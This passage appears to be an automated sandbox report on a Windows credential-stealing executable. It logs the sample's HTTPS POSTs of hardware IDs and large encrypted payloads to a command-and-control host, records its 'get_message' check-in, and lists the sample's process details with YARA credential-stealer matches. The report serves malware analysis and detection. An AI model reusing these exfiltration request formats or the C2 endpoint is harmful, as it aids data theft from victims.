                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893c82db13729f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1964&rtt_var=796&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=3457&delivery_rate=1324263&cwnd=178&unsent_bytes=0&cid=6d7a674fb827846b&ts=1843&x=0"
                                                                                      2025-01-27 13:54:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                      Data Ascii: fok 8.46.123.189
                                                                                      2025-01-27 13:54:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.749871104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:46 UTC372OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 553130
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 42 32 35 33 31 42 43 38 39 41 39 34 34 41 33 30 30 35 46 32 30 35 37 44 32 43 37 44 36 43 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F5B2531BC89A944A3005F2057D2C7D6C--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: 0a be aa 59 28 0f 4a 0e 93 ab ba 85 c1 59 83 d5 3f 22 ef 10 f7 9f aa f2 16 d0 b3 03 11 fb 78 1e ae 8c d9 f5 78 7d b4 fd df 08 5b cd d5 62 5a 73 a0 d8 11 28 e9 da ed 29 35 9e b4 66 22 a5 e6 94 ac e6 10 2c d3 53 8a f8 04 de 4c 69 19 a6 f8 3c 66 91 9c c6 6d 09 74 95 67 73 1d f1 1c e2 9a fc f0 92 73 c1 2f db 87 d9 24 22 b5 03 45 11 d8 92 5e fb 16 0c 1b ec 2a 4c 8f 32 c2 c2 7e 0b d0 06 37 76 c9 44 41 b9 b6 5f 38 0f 24 2f 3b 2f 4d 7e 74 db f1 51 2c f9 42 53 e5 54 a9 5d 11 cc 3c 97 99 51 06 75 f2 a5 80 2b 0b fd de 2b d7 f9 cc 3d 4d a8 82 5b 07 37 6c 34 53 6a 3c 6a 63 e9 7e 72 a8 75 51 de 99 e1 f0 eb 80 16 4d ab 4e 5a d9 93 b4 73 64 cb b2 bc 65 37 ec 07 be 2a 59 10 72 0f 53 1e c4 09 56 b5 2b 83 68 01 cd 4f 3b 03 01 89 b1 c1 32 db df d5 28 ad 28 ca e2 e3 ea 15 65
                                                                                      Data Ascii: Y(JY?"xx}[bZs()5f",SLi<fmtgss/$"E^*L2~7vDA_8$/;/M~tQ,BST]<Qu++=M[7l4Sj<jc~ruQMNZsde7*YrSV+hO;2((e
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: 65 1e 14 37 25 41 3c c4 1c 67 2b 07 5d 91 b3 8b a7 78 5b 39 3b f4 5d 26 47 56 48 cf 17 23 40 f6 4e e6 a9 30 89 43 fd ad b7 1e 6f 13 0b 93 58 b7 7e 4c de 7d 0c 13 17 eb d7 cc 7b 5b 52 0a 2a 39 2f 99 6e 1f 5d eb 06 f1 ba d4 1f 6b 86 dc 73 03 f4 8b 3f 4c 09 ee 6e bc 2f ea 71 a5 5b 3d 4b bf 78 38 f9 2e bd 72 60 3b f7 c7 03 be 8f 0f 5a 97 77 2a 47 d7 fc 0a 9e 3e 7c 29 35 cc 79 ba fa f2 e9 cd 5f 6f 55 2f 37 af f6 d4 6d b2 57 6b b7 dd 5e c4 3f 54 9b 93 06 c3 de 03 05 5f 3f 5e 73 4c 4b 37 1c 8f 5c 9d b8 6f b5 ce 5c 8a 25 1b 92 b9 fd d8 44 82 d3 42 66 57 a9 a2 84 ff e7 58 9f 65 9a 6a 61 6c 8a 87 6c f2 a3 d5 03 b5 6e 19 55 0f 73 96 8c e8 e7 d0 bc 9a a0 87 49 28 5d 93 b9 9a b8 1f a1 b6 e1 bd f7 fe 7a 4c 3f 70 08 ae 0e 6c 71 d4 ee 09 f6 47 03 b7 cb de 11 b1 3e 74 69
                                                                                      Data Ascii: e7%A<g+]x[9;]&GVH#@N0CoX~L}{[R*9/n]ks?Ln/q[=Kx8.r`;Zw*G>|)5y_oU/7mWk^?T_?^sLK7\o\%DBfWXejallnUsI(]zL?plqG>ti
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: a3 7f 7e bc 71 d4 6e 38 7a 6a 23 f5 44 79 49 a2 1b 26 f4 3f 44 f6 2d 6d e2 c6 e8 60 56 0c 24 81 45 8f 18 56 29 86 dd 8a c8 06 36 e1 3c fe 8e e3 47 f3 7b c3 ec e2 34 9d 7c a5 6e 0b d6 f5 1c e4 0f 66 4b a9 56 69 3f df 27 6d d6 24 78 ae 33 2d 12 86 23 3c f9 50 9c ee df 42 be d8 e2 db 2c af 94 e6 2e 5f c9 7b 5f ae 61 16 9f aa 27 3c 20 6f af 61 17 b8 4a 7a a8 13 2a bb bd 38 30 21 fe bd e3 a7 8f ad 42 fa 6a 8d d0 15 31 75 a3 f4 34 41 d7 ef 06 ed 3f 3a 6f ce a6 e9 e2 8e 2a f6 b9 82 54 a9 dc 61 4f f5 de 39 a3 1d a3 a2 37 b7 e0 ce 17 1e 63 77 04 4f 3e 3b 0b fc e1 30 4f 9e 9f 55 59 42 8c 2e 79 a3 30 c3 d9 22 0d 08 92 38 5a 26 e7 0d 1d 5e 7c 0b d4 a1 e5 db 53 e5 c5 e9 b9 fd 76 e4 7e 17 7e 53 f7 a9 bc 8a 4b 0a 77 87 34 6e a7 9b 7d 24 e6 f2 2e 1f 8e c6 e5 6b 35 b8 fd
                                                                                      Data Ascii: ~qn8zj#DyI&?D-m`V$EV)6<G{4|nfKVi?'m$x3-#<PB,._{_a'< oaJz*80!Bj1u4A?:o*TaO97cwO>;0OUYB.y0"8Z&^|Sv~~SKw4n}$.k5
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: 88 95 06 29 45 4d fd cd 46 e5 eb 02 0c 83 ff 82 72 fc 9b 0b 0c 3f 34 bd 1b ea d1 96 38 3d b0 d9 1f 7a fb 20 3f 86 77 e3 88 ec f4 aa 65 1c 57 26 b5 d8 50 4c 8c 07 ec 54 c1 30 95 97 dd 0e 70 d4 0f 51 1d a6 88 e5 5a 4f f8 93 52 bf 3e da cc d8 ed 84 cf 8f cf 7f f0 55 91 6f fe c6 dc a7 86 7e 31 a1 9f 4a d1 41 0c 23 76 6c 0f 6e d6 8f f0 70 3e e1 81 71 b5 b1 07 ba a3 2b 2f 65 ce 45 21 6c 72 e3 ec c7 b4 6a 43 3d b9 84 26 c3 4b d3 55 4f e8 c9 68 73 f5 ec 87 fd dd 0b 2c 30 e1 f9 ab 44 4d 89 48 27 ae f2 f2 4c ac 15 7c 25 06 df 3a f7 34 c2 43 bf eb dd 4b 44 bb 51 6d 7f e3 36 fc 19 e3 ce b7 ba 76 32 bf ce 36 c4 2f 34 7d f6 7a 9b da 8b 9b 86 76 22 c4 57 0d f1 4d c7 92 d1 9e 85 14 f5 91 83 11 ea 59 f1 71 9f 25 47 a1 65 91 d5 43 b3 0d ae ea d7 38 d7 0f e1 5f 50 12 5c dc
                                                                                      Data Ascii: )EMFr?48=z ?weW&PLT0pQZOR>Uo~1JA#vlnp>q+/eE!lrjC=&KUOhs,0DMH'L|%:4CKDQm6v26/4}zv"WMYq%GeC8_P\
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: 46 74 db 74 ef c0 f5 03 a2 5e f7 9d 48 23 14 92 13 f3 f7 d6 1f 6f b4 81 4a df bf f5 52 51 e5 33 ed b7 39 33 27 8f 7e 13 61 0a 6d cf f3 cc 7d a5 07 a6 ff d2 2a 9f d9 6e d0 cc 23 78 be 42 b2 1b 26 60 3f c4 f8 30 d7 b5 f4 63 ee aa c4 c6 b5 99 a0 bc 3b dd 2e e7 87 3f e5 09 61 c1 fe f6 a9 5d 87 93 ef a1 4e fc 65 ae 05 12 be a3 b7 bd 7b 87 4b f4 86 73 dc 8d 18 8b 22 f2 ac 10 d8 5f 3f 35 9a 72 78 7b 25 12 1f fb 86 63 60 ed 37 53 c4 46 b5 b8 c2 ef a9 08 0a 19 f1 09 79 39 cc 70 6a 73 d9 a6 cf 67 bc a8 9f ee 94 9a 38 af 1f 79 4c 23 fe a3 11 62 dc b7 0b 66 5b 50 7c d1 3b 3a e4 c2 82 35 39 72 a8 c8 9b 3c 54 81 79 95 ae b3 7b cd e7 b3 58 92 a8 ea 5d f5 be 25 1c 15 10 c1 c4 f8 04 bd c6 83 c0 bc 79 c4 ca 36 0d d1 68 ed 3f e7 7d 30 b4 bd 14 b5 12 8b a2 6c ba db 87 17 63
                                                                                      Data Ascii: Ftt^H#oJRQ393'~am}*n#xB&`?0c;.?a]Ne{Ks"_?5rx{%c`7SFy9pjsg8yL#bf[P|;:59r<Ty{X]%y6h?}0lc
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: 46 3a a2 8f 01 13 2d 7c cd c8 7b 91 a1 5c a3 ab e4 50 d9 dd 65 dd c9 af 99 07 da 5a 59 85 a4 5b 47 e2 e7 2b 7e 86 18 14 68 ee 46 c3 71 48 3d d4 ba 08 53 04 6b 1e bf 52 7a f5 52 58 b7 78 36 39 a1 95 86 03 02 e5 08 ed 9b 2f 79 93 61 22 4c 00 a6 73 b3 86 93 d8 ad 90 e7 db 96 34 b7 21 78 86 ef 1c 09 6b 33 e5 b6 fc 5f 2e a1 ae c6 60 d2 5b b0 f1 4e f7 48 b4 36 ce 29 f2 92 04 e2 c6 48 b4 2e 22 a8 97 fa 6f 28 91 8c 6a 65 f7 5d df d7 ca 2e 7c 83 57 ab 40 88 cb 28 1b 0e ea 7b a5 22 6f 03 bf 32 44 3b 84 35 8f f4 ef fb ee 01 09 b5 60 5f db 16 a4 b5 b2 23 80 cc 72 e1 cd e4 07 18 a9 98 3e 6f 81 01 99 43 57 73 5e fd 25 41 d3 10 ef a1 be 7d b0 d9 2a 81 cf a6 3d 12 22 ce 6e 75 06 14 ef 6e d0 43 66 09 99 07 3d bb a6 a2 f3 ef 85 d7 8c 33 57 aa f9 38 45 22 c9 1b 17 e0 70 38
                                                                                      Data Ascii: F:-|{\PeZY[G+~hFqH=SkRzRXx69/ya"Ls4!xk3_.`[NH6)H."o(je].|W@({"o2D;5`_#r>oCWs^%A}*="nunCf=3W8E"p8
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: 36 06 6a 16 8b d8 e9 6c b1 0d e9 88 cf e3 25 a3 55 7a a1 ba 9c 79 bb bf 6c 0f 55 3f 48 e7 5e 45 27 fd cd 0d 48 e8 ef 1a ce bc a0 92 c2 02 6e 5f af c4 d5 22 e5 20 75 d6 c2 d1 d6 57 67 ca e6 17 1b 39 27 97 db 08 9a 6c 85 a5 c2 e1 f4 cd 6d 8b 08 4d 3e b3 76 b6 ec 8b 90 45 8d 50 8d 81 70 61 e6 f5 33 62 a2 63 ed d3 f4 04 f7 6b 42 1f 1a 9c 6f 39 f4 0a ed dc 39 0b fa 98 eb 2b ff 5b f2 20 2f 1f 7a ae ed 23 dd 5b 88 e8 bf 7d 7e 7e 9f 8d ea a5 f3 47 f8 b3 02 ec 66 d7 36 73 4f e2 7c 91 4a ad 02 e3 83 b4 0e 2c ea 64 a1 c0 d1 57 56 07 77 f1 ae 20 f5 04 85 a0 ca 63 14 75 54 4a 3e d0 0a e2 d1 a0 dd 32 f9 71 e6 28 b7 8c 07 28 86 ed d7 de 1b 9a bd 58 63 15 1c 19 03 e0 d4 87 5c f9 43 73 3e a2 05 58 ab 55 7b 80 fe bd 3a 64 27 0f c8 ca d0 c5 ea 1f 5d a6 a3 80 89 71 b3 0e 72
                                                                                      Data Ascii: 6jl%UzylU?H^E'Hn_" uWg9'lmM>vEPpa3bckBo99+[ /z#[}~~Gf6sO|J,dWVw cuTJ>2q((Xc\Cs>XU{:d']qr
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: d8 31 5f 90 c8 94 f4 03 a7 64 8f d6 9a 5b c0 15 81 6e f7 49 ea 3d a1 7b df c4 d4 54 b6 95 ef e6 5f e7 b9 ff 24 70 a7 a4 81 ea 7c 53 2c ba 45 29 3b 1a ff 80 6d 71 56 27 e9 8b 5a 50 5b 8d 84 80 cc 93 b3 76 9c e9 f1 ab 23 d0 df dc 23 72 ee 05 e0 5f 90 5e 52 81 71 0b 83 62 5a d5 5f 3f b7 a3 1f 0c 5f 01 3f 2e fd 5e 7d 66 76 d9 11 18 1d 83 25 43 e2 e9 bd 3b 87 0c 90 1c 74 64 e5 d4 ea a9 9f 0d 48 46 99 38 96 43 0b e8 bc 9a b2 d8 43 52 56 04 f6 b5 b9 0c fb d9 ea 37 b6 77 43 5a 6f 3c 51 e9 38 4a cf c0 35 e7 17 0f 76 fe 2a 52 38 01 55 af 7d f0 ba d9 ea 67 90 a9 23 3b 6d 23 bd e9 42 05 c5 2f 1a 13 a6 5d 22 14 9f 1f bc ad 41 5c 75 85 90 68 ed 6f fc 39 76 3d 9c b2 61 c3 53 31 c5 d2 e1 4b 92 bc b4 eb 45 2d bb f7 5a 8c 4c 66 11 dd 5c e9 23 e9 16 1f 73 d2 07 ab 7b df 3c
                                                                                      Data Ascii: 1_d[nI={T_$p|S,E);mqV'ZP[v##r_^RqbZ_?_?.^}fv%C;tdHF8CCRV7wCZo<Q8J5v*R8U}g#;m#B/]"A\uho9v=aS1KE-ZLf\#s{<
                                                                                      2025-01-27 13:54:46 UTC15331OUTData Raw: 18 f2 be 5f 20 5b 7c 3f 15 ee bf ec 51 95 6e 6d b5 0f f6 23 e1 9a 2e 72 f7 22 f5 09 84 de b0 49 a1 8d a8 e3 8e 5f bd 3e 61 32 ea 3b a9 a6 43 4d f2 b4 f1 50 e2 ec bc 4e 6f 44 9c 90 0b f6 a2 26 23 8e b5 73 30 e7 9a bb e8 1a c5 be e9 a8 32 b4 b9 c1 b3 35 e9 0b de d9 b3 a7 3d 6f 7e 9a 21 41 4a 59 ff d9 7e cf 7f d6 2f ff c6 ec 4b fe 70 8f 13 7f ae 31 ac d6 86 d1 c2 4b f5 b3 13 c5 8e 57 cd d0 98 fd 3c 0c 75 bd 3f c5 65 3d 6b f6 a5 df 1d 25 98 1a 30 f8 c0 77 e4 d9 9c 1f 71 95 48 9d d3 75 65 c3 9c ce 1a 4c 6f 53 25 e5 8b 41 1b 75 e1 96 59 cf 88 2d bf 32 84 9b 85 31 0b 74 49 11 0d b2 4d 11 4f 86 99 ee e8 15 77 c1 86 99 1d 5d e9 1f b4 e7 ff 91 5e f9 37 6c 8e 32 75 d5 ec b2 20 e8 f2 6b 34 d9 82 04 25 4a ec f6 67 9c 26 04 63 bb cf cd 6a 9f ce 85 88 90 be a9 2f 0a ee
                                                                                      Data Ascii: _ [|?Qnm#.r"I_>a2;CMPNoD&#s025=o~!AJY~/Kp1KW<u?e=k%0wqHueLoS%AuY-21tIMOw]^7l2u k4%Jg&cj/
                                                                                      2025-01-27 13:54:48 UTC1126INHTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:48 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=pl8t9u8aba70kc9oa4eupku7cl; expires=Fri, 23 May 2025 07:41:26 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Br8ScuBvY2raRDhZ6Cy78wjLv36hBOrCw2TcaP6n%2F6DJbupHNsXgtCRwhFDpO0ucwzcwxWpxDCyARlqOllw0lQ3KYz0u6RJL50SGkmfz%2FZ2znETJ0ExsYi6jKhenMuHqDThh"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893c8ec853729f-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1996&rtt_var=998&sent=195&recv=575&lost=0&retrans=1&sent_bytes=4218&recv_bytes=555722&delivery_rate=365685&cwnd=178&unsent_bytes=0&cid=33d3e953e08fa385&ts=2493&x=0"


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.749892104.21.112.14437392C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-27 13:54:48 UTC353OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 77
                                                                                      Host: platformcati.sbs
                                                                                      2025-01-27 13:54:48 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 35 42 32 35 33 31 42 43 38 39 41 39 34 34 41 33 30 30 35 46 32 30 35 37 44 32 43 37 44 36 43
                                                                                      Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--&j=&hwid=F5B2531BC89A944A3005F2057D2C7D6C
                                                                                      2025-01-27 13:54:49 UTC1118INHTTP/1.1 200 OK
                                                                                      Date: Mon, 27 Jan 2025 13:54:49 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=elcvtb6emru6f1eo0apb06uvqt; expires=Fri, 23 May 2025 07:41:28 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfFGOpqLy95rUKFDG%2FUd4v3DCg7urXLRUNCnIzXZ1V1tQL9cHQMXmCPm3NRnWLNzTJelZX5YrlAgFFPrYP7n4tM9XLMwUj75FiXcshlryjJCq099DKO9DaO4GrVLGaJif0Ev"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 90893ca0a9d743b3-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1567&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1066&delivery_rate=1819314&cwnd=212&unsent_bytes=0&cid=0c1e86b957bf630f&ts=813&x=0"
                                                                                      2025-01-27 13:54:49 UTC142INData Raw: 38 38 0d 0a 32 52 42 53 6e 58 32 39 41 73 32 76 4f 32 53 34 53 74 31 69 6c 30 6f 4b 38 4c 59 70 42 2b 47 74 46 53 54 65 74 58 4c 6a 73 52 36 43 61 33 44 6f 58 34 63 67 70 64 74 50 46 4d 74 77 67 55 33 4c 5a 57 4f 45 78 56 74 69 6c 38 4a 35 55 61 72 63 48 59 33 63 66 37 35 2b 4a 2b 35 54 78 58 75 33 38 78 51 33 30 43 53 7a 42 50 4e 6b 62 34 6a 54 43 79 76 44 79 32 45 47 35 49 56 65 77 64 51 38 34 79 41 76 77 41 3d 3d 0d 0a
                                                                                      Data Ascii: 882RBSnX29As2vO2S4St1il0oK8LYpB+GtFSTetXLjsR6Ca3DoX4cgpdtPFMtwgU3LZWOExVtil8J5UarcHY3cf75+J+5TxXu38xQ30CSzBPNkb4jTCyvDy2EG5IVewdQ84yAvwA==
                                                                                      2025-01-27 13:54:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Click to jump to process

                                                                                      050100s0.00510152025MB

                                                                                      Click to jump to process

                                                                                      • File
                                                                                      • Registry

                                                                                      Click to dive into process behavior distribution

                                                                                      Target ID:0
                                                                                      Start time:08:54:11
                                                                                      Start date:27/01/2025
                                                                                      Path:C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\h226x41CQ6.exe"
                                                                                      Imagebase:0xe70000
                                                                                      File size:491'048 bytes
                                                                                      MD5 hash:FC8506934F3F379AF5F36CDCCB0C17CA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:08:54:11
                                                                                      Start date:27/01/2025
                                                                                      Path:C:\Users\user\Desktop\h226x41CQ6.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\h226x41CQ6.exe"
                                                                                      Imagebase:0xe70000
                                                                                      File size:491'048 bytes
                                                                                      MD5 hash:FC8506934F3F379AF5F36CDCCB0C17CA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1528754817.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1530149419.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1559608097.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      Target ID:10
                                                                                      Start time:08:54:12
                                                                                      Start date:27/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 260
                                                                                      Imagebase:0x5c0000
                                                                                      File size:483'680 bytes
                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      No disassembly